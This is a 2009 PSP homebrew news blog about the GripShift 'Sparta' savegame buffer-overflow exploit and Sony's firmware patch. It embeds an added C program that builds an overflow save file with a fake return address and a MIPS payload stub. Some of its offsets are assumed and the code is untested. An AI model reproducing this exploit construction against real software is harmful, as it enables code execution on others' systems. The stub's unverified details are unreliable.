PSP-Hacks.com


PSP Firmware 5.03 Released *Updated*

greg | January 20, 2009

Update: It’s been confirmed: Firmware 5.03 indeed patches the GripShift save game exploit.


Sony has officially released PSP firmware 5.03. Now there isn’t much detail at this time; however, if you’re a PSP-3000 owner holding on tight to your GripShift UMD, I’d recommend not updating, not yet anyway…

According to Eric Lempel, “this is a small update that improves system software stability during use of some features.”… Yeah, I bet.

We’ll keep you posted.

Download: PSP Firmware (Official) 5.03


Gin & Exploits

greg | January 13, 2009

With so much drama in the PSP scene, it’s hard knowing who’s who and from what regime… But, somehow, someway, Dark_AleX sets the record straight like every single day… And today: a little background info concerning this bit of news — the GripShift kernel mode exploit video…

To quote Dark_AleX himself –

This is about how I trusted someone called “miriam” and I gave him a kernel exploit of C+D, which was found by joek (the ONLY ONE that deserves credit of that), just to play for HIMSELF, as it is being used to decrypt 3k modules, but the first thing he did was to show to others to get a bit of fame.

Now I realize not to trust anyone anymore, thanks.

So here we are today: stuck in user-mode land and completely HEN-less, with no public kernel-mode exploit to build a Homebrew Enabler on.


GripShift/Sparta Exploit: Pong v1.0 Released

greg | January 11, 2009

Dragula96 says it best: “it just feels wrong when a Hello World is not followed by Pong.” Thus, a newly coded version of Pong for the Sparta/GripShift exploit. It’s Pong; what else can I say?

Download: Pong v1.0 (for Sparta/GripShift Exploit)

- source: qj


Team N00bz on The Sparta Exploit

greg | January 8, 2009

It is indeed exploit fever season, and the remedy — more N00bz! That’s right — the N00bz have combined forces with MaTiAz and FreePlay to help further expand on the recent “Sparta” (GripShift) exploit. The plan:

Our initial focus will be to make it easier to run standard homebrew via this exploit, by adapting eloader to it. This will be restricted purely to user-mode homebrew, since there is currently no public kernel-mode exploit that could be used here, and compatibility is likely to be patchy due to the security measures in the later firmwares which make determining all the syscalls almost impossible. Still, you can expect that at least some emulators and other popular pure user-mode homebrew will run.

So with that said, don’t get too excited about a downgrader solution yet. If someone discovers a way to bust kernel mode wide open, then downgrading via Sparta could well become possible.

- full article/source: noobz.eu


The Sparta Exploit! “Hello World” and SDK Released

greg | January 4, 2009

Back at it… MaTiAz & FreePlay have released a “Hello World” demonstration, as well as the SDK used to build said homebrew demo, for the newly discovered GripShift vulnerability.

Now coined the Sparta exploit, here’s what you should know: for the moment, you cannot downgrade or install a custom firmware with this; you can only run Sparta-compiled homebrew and hope Sparta later leads to kernel mode access.

And finally, another video for your viewing pleasure –

FAQ
---
Q: Will this allow downgrading?
A: No, because this is a usermode exploit and the functions required to downgrade are only available in kernel mode.

Q: Why the name?
A: Because the original exploit was found by overwriting the player name with "this is spartaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".

Q: Can/Will Sony block this?
A: Yes.

Q: I wanna make homebrew using the exploit. How?
A: Get FreePlay's GS SDK: http://tinyurl.com/sparta-sdk. It has some constraints though, check the readme. The Hello World was written with it.

Download:
The Sparta SDK
Hello World (for the Sparta Exploit)

– source: lan.st


POC: GripShift SaveGame Exploit Found; Works on PSP-3000!

greg | January 3, 2009

Every so often claims are made and videos surface, most of them completely fabricated, but this time we have the real deal: a user-mode buffer overflow exploit, discovered by MaTiAz and confirmed working by both MaTiAz and FreePlay. The vulnerability lies in GripShift’s save game loading routine. Check it –

It’s a step in the right direction all right.

Let me quote MaTiAz –

GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name which can be easily used to overwrite $ra. The savegame file is pretty big (25kB) so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running). The return address is located at offset 0xA9 in the file. In this poc it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file.

It was tested on 4.01M33-2 with US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn’t [be bothered to] get Shine’s savegame tool working so it’s in plaintext form) is in the SDDATA.BIN form which Hellcat’s Savegame-Deemer produces (thanks to him, if the program didn’t exist I wouldn’t have bothered with this). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don’t forget to have Savegame-Deemer working, duh.
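To make the layout in MaTiAz’s description concrete, here is an added example (my own code, not MaTiAz’s or FreePlay’s POC and not the file they released) that writes a plaintext GripShift save in the shape the quote gives: the profile-name run, a fake $ra at file offset 0xA9 pointing at 0x08E4CD50, and a hand-assembled MIPS stub at offset 0xCC. The offsets, the return address and the file size come from the quote; everything else is assumed: that the profile-name field begins at 0x80, the stub itself (a VRAM fill chosen to mimic the “paint the framebuffer white” marker), and 0x44000000 as the uncached PSP VRAM base. The stub has not been run on a PSP.

```c
/*
 * Added example (mine, not MaTiAz's or FreePlay's POC): builds a plaintext
 * GripShift save (SDDATA.BIN form) laid out the way the quoted description
 * gives it, and hand-assembles a small Allegrex (MIPS) stub for the code slot.
 * Facts from the page: ~25 kB file, the saved $ra is taken from file offset
 * 0xA9, the POC points it at 0x08E4CD50, and the code starts at 0xCC.
 * Assumptions (not from the page): the profile-name field starts at 0x80,
 * the stub itself, and 0x44000000 as the uncached PSP VRAM base.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SAVE_SIZE     25600u       /* "pretty big (25kB)" */
#define NAME_OFFSET   0x80u        /* assumption: where the profile name field begins */
#define RA_OFFSET     0xA9u        /* page: the bytes that land in the saved $ra */
#define CODE_OFFSET   0xCCu        /* page: where the payload code starts */
#define SPARTA_RA     0x08E4CD50u  /* page: return address used by the POC */
#define VRAM_UNCACHED 0x44000000u  /* assumption: PSP VRAM (2 MiB), uncached mirror */

/* The PSP's Allegrex core is little-endian MIPS, so multi-byte fields are LE. */
static void put_u32le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
uint32_t get_u32le(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* $ra points "a few bytes after the return address", i.e. into the save buffer
 * itself, so file byte 0 must sit at SPARTA_RA - CODE_OFFSET in RAM. */
uint32_t sparta_load_base(void) { return SPARTA_RA - CODE_OFFSET; }

/* MIPS I-type encoder: op(6) | rs(5) | rt(5) | imm(16). */
static uint32_t mips_i(uint32_t op, uint32_t rs, uint32_t rt, uint32_t imm16) {
    return (op << 26) | (rs << 21) | (rt << 16) | (imm16 & 0xFFFFu);
}
enum { R_ZERO = 0, R_T0 = 8, R_T1 = 9, R_T2 = 10 };
enum { OP_BEQ = 4, OP_BNE = 5, OP_ADDIU = 9, OP_LUI = 15, OP_SW = 43 };

/* Stub (assumed, not the POC's): fill all of VRAM with 0xFFFFFFFF, solid white,
 * then spin forever. Word idx of the stub, or 0 when idx is out of range. */
#define STUB_WORDS 9
uint32_t sparta_stub_word(size_t idx) {
    const uint32_t code[STUB_WORDS] = {
        mips_i(OP_LUI,   R_ZERO, R_T0, VRAM_UNCACHED >> 16), /* t0 = VRAM base          */
        mips_i(OP_LUI,   R_ZERO, R_T1, 0x0008),              /* t1 = 0x80000 words      */
        mips_i(OP_ADDIU, R_ZERO, R_T2, 0xFFFF),              /* t2 = 0xFFFFFFFF         */
        mips_i(OP_SW,    R_T0,   R_T2, 0),                   /* loop: *t0 = t2          */
        mips_i(OP_ADDIU, R_T1,   R_T1, 0xFFFF),              /* t1--                    */
        mips_i(OP_BNE,   R_T1,   R_ZERO, 0xFFFD),            /* t1 != 0: back 3 words   */
        mips_i(OP_ADDIU, R_T0,   R_T0, 4),                   /* delay slot: t0 += 4     */
        mips_i(OP_BEQ,   R_ZERO, R_ZERO, 0xFFFF),            /* b . : hang here         */
        0u,                                                  /* delay slot: nop         */
    };
    return idx < STUB_WORDS ? code[idx] : 0u;
}

/* Lay out the save: name run, fake $ra, code. 0 on success, -1 if it won't fit. */
int build_sparta_save(uint8_t *out, size_t out_len, const uint32_t *code, size_t nwords) {
    static const char prefix[] = "this is sparta";   /* the name the bug was found with */
    if (out_len < SAVE_SIZE || CODE_OFFSET + 4 * nwords > SAVE_SIZE) return -1;
    memset(out, 0, SAVE_SIZE);
    size_t i = NAME_OFFSET;
    memcpy(out + i, prefix, sizeof prefix - 1);
    i += sizeof prefix - 1;
    while (i < CODE_OFFSET) out[i++] = 'a';           /* no NUL until the code begins */
    /* 50 CD E4 08 contains no zero byte, so even a string-terminated copy of the
     * name runs straight through the fake return address. */
    put_u32le(out + RA_OFFSET, SPARTA_RA);
    for (size_t w = 0; w < nwords; w++) put_u32le(out + CODE_OFFSET + 4 * w, code[w]);
    return 0;
}

/* 1 if there is no NUL from the name start through the fake $ra; a zero byte in
 * that run would cut the overwrite short if the game copies the name as a C string. */
int name_run_is_nul_free(const uint8_t *save) {
    for (size_t i = NAME_OFFSET; i < RA_OFFSET + 4; i++)
        if (save[i] == 0) return 0;
    return 1;
}

/* Builds the demo save with the stub into a static buffer; NULL on failure. */
const uint8_t *sparta_demo_save(void) {
    static uint8_t save[SAVE_SIZE];
    uint32_t code[STUB_WORDS];
    for (size_t w = 0; w < STUB_WORDS; w++) code[w] = sparta_stub_word(w);
    return build_sparta_save(save, sizeof save, code, STUB_WORDS) == 0 ? save : NULL;
}

int main(void) {
    const uint8_t *save = sparta_demo_save();
    if (!save) return 1;
    FILE *f = fopen("SDDATA.BIN", "wb");             /* plaintext save, as Savegame-Deemer uses */
    if (!f || fwrite(save, 1, SAVE_SIZE, f) != SAVE_SIZE) return 1;
    fclose(f);
    printf("$ra @0x%X = 0x%08X, code @0x%X, assumed load base 0x%08X\n",
           (unsigned)RA_OFFSET, (unsigned)get_u32le(save + RA_OFFSET),
           (unsigned)CODE_OFFSET, (unsigned)sparta_load_base());
    return 0;
}
```

The point the layout makes: the return address is not sent to some external shellcode region but back into the save buffer itself, which is why the load address of the file has to be stable (the assumed base here is simply 0x08E4CD50 minus 0xCC). The NUL-free check matters for the same reason the name had to be a long run of ‘a’s: whatever copies the profile name must keep going past the saved $ra. The stub is a plausible framebuffer-white marker and nothing more; a real payload on the PSP would also have to worry about the data and instruction caches before jumping into bytes that were just read from disk.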

Download:

GripShift SaveGame Exploit (POC)
(both MaTiAz and FreePlay’s included)

Savegame Deemer
(to decrypt and use the unencrypted GripShift savegame)

- source: lan.st

